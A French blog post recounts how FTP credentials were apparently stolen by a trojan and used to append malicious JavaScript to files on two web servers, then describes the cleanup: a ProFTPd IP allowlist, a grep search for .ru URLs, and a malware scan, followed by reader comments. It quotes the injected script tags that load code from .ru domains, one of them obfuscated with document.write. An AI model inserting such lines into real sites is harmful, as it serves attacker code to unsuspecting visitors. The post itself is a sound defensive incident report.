Hack de site : Insertion de javascript depuis pocketblok.ru, chickcase.ru et inkrainbow.ru
Un serveur touché
Tout a commencé il y a trois jours lorsque je remarque que sur un de mes sites, le nombre de connecté est égal a 0. chose plutôt rare sur un site générant plus de 15k vu/jour. Je me rend sur l’index et constate une erreur php, en analysant le fichier index, je me rend compte que l’on dirait que celui ci a été mal envoyé. Mes collègues n’ayant pas touché au site, je renvoie le fichier, le site se remet en marche.
Et de deux
Je me rends ensuite sur le blog sur lequel vous êtes en train de lire ce billet, lui aussi se retrouve avec une erreur, cela parait étrange, les deux sites se trouvent sur des serveurs différents, il ne me faut pas beaucoup de temps pour me rendre compte que les deux serveurs ont été hacké, et qu’une ligne de code javascript à été injecté à la fin de certains fichiers.
Cette ligne ressemble a la suivante:
<script type="text/javascript" src="http://pocketbloke.ru/Facebook.js"></script>
<!--5465418sd5s4ds84ddss58d4s5ds7 -->
ou bien encore
<script type="text/javascript" src="http://chickcase.ru/Dtabase.js"></script>
<script type="text/javascript" src="http://inkrainbow.ru/Google.js"></script>
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Database.js"></scri'+'pt>');
Comment ce code malicieux a t’il pu se loger sur deux de nos serveurs, la coïncidence est trop étrange, cela provient forcement de notre poste de travail, le logiciel que je suspect est filezilla, en effet j’avais déjà lu des problèmes de sécurité liés aux mots de passes de ce logiciel qui ne sont pas codés.
Désinfection serveur
Je m’intéresse ensuite aux logs de connexion aux serveurs, je me rend compte que différentes IP se sont connectés aux serveurs, ont téléchargé des fichiers puis les ont reuploadé avec ajout du code malicieux, la géolocalisation de ses IP me fait faire le tour du monde, impossible de réellement tracer tout cela. L’important est de toute façon de vite nettoyer les nombreux sites hébergés sur les serveurs.
Vu que les fichiers ont été modifiés en FTP, je décide de n’autoriser la connexion au serveur par ce protocole qu’a certaines adresses IP prédéfinies, cela grâce au fichier de configuration de ProFTPd.
Extrait de la configuration pour n’autoriser qu’une IP :
vim /etc/proftpd/proftpd.conf <Global> <Limit LOGIN> Order Allow,Deny Allow from 127.0.0.1 DenyAll </Limit> </Global>
Il ne me reste plus qu’a changer tous les mots de passe ftp des sites, scanner tous les fichiers du serveur afin de partir a la recherche des expressions contenant un .ru (grâce au très efficace Grep) et de les supprimer.
Petit exemple de comment rechercher tous les fichiers contenant « http://unsiterusse.ru » en excluant certains dossier :
egrep -ir --exclude-dir=vpopmail --exclude-dir=/home/mysql --exclude-dir=/home/log --exclude-dir=/home/ovh "http.*\.ru/.*\$" /home/
Désinfection Poste de travail
Coté poste de travail, l’installation de MalwareBytes a mit en évidence un trojan qui s’était dissimulé dans mon ordinateur, c’est vraisemblablement ce dernier qui s’est chargé de récupérer les informations précieuses de connexion aux sites.
Pour ceux que cela intéresse, vous trouverez chez @neamar des info concernant ce probleme sur lequel notre cher collègue s’est aussi heurté. Un merci aussi a @PoT_de_NuTeLLa, @ViNzZzZ, @dmarkowicz, @RandyOlson69,
11 Commentaires
août 30, 201018 h 43 min
Même problème ça m’est arrivé hier soir…
Mais pour un serveur mutualisé ovh 60GP la seule solution viable c’est de ne pas enregistrer son mot de passe ftp dans filezilla non ?
oct 29, 201016 h 55 min
La boite ou je travaillais avant c’est fait hacké 2500 sites dont l’index avait sauté …. le stress… un code qui est passé par un formulaire …mais ce ne sont pas toujours les russes derriere ..cela peut juste etre un écran 
déc 2, 20100 h 40 min
Intéressant ton procédé pour remédier au problème. Peut être qu’un jour cela me servira, mais je suis pas pressé…
mai 23, 201118 h 26 min
Bonjour, les sites supposés russes (.ru) se livrent aussi a toutes sortes de spam.
sept 6, 201121 h 59 min
Intéressant, c’est effrayant tout ce qu’on peut mettre au point pour hacker. On retrouve en effet souvent les .ru, récemment même sur mon blog avec la faille timthumb qui a touché des milliers de blogs qui utilisaient ce plugin dans leur thème… Ca fait mal et très peut lorsque l’on s’en aperçoit…
sept 11, 201118 h 23 min
En ce moment c’est plutot les spams mailing en .ru qui me poisonnent la vie. Merci pour l’info en tout cas, j’utilisais moi aussi beaucoup Filezilla auparavant, j’ai bien fait d’arreter…
sept 12, 201122 h 02 min
J’ai aussi eu une injection de code javascript sur ma boutique en ligne. Une galère.
Est-ce que tu as des infos pour se prémunir de ce genre d’attaque via file zila ? y a pas des patchs ou autres choses à mettre.
sept 15, 201120 h 40 min
C’est vrai mon ami de plus en plus faut faire attention au hack car souvent c’est nous qui vont faire le gros travail et ce sont eux qui veulent en profiter donc il faut vérifier nos sites le plus souvent possible et merci pour tes infos. ps:excuse moi j’avais oublié mes 3 w sur mon site.
oct 26, 201111 h 16 min
Merci, nous avons également eu des petites problème de ce genre pas plus tard qu’il y a deux semaines
Les liens sont en Dofollow mais nécessite l'approbation de l'administrateur, si celui ci décide que le commentaire est inintéressant, ne fait qu'une ligne pour avoir un joli lien retour, ou si j'ai eu une rude journée :) , le commentaire sera purement et simplement supprimé.
Tous les autres commentaires avec un effort de rédaction sont appreciés
« J’ai omis les mots de passe… C’est une catastrophe Billet suivant
Le vendredi c’est le jour du Follow Friday »
Blog RSS Feed
Subscribe via E-mail
Follow Me on Twitter
11 h 03 min
Merci de partager.
J’ai le problème sur plusieurs sites/serveurs et c’est pas super fun comme moment.
Je vais demander à tout ceux qui ont acces au ftp de passer un anti malware.
Qu’est ce qu’on perd comme temps et comme énérgie sur ce genre de mer…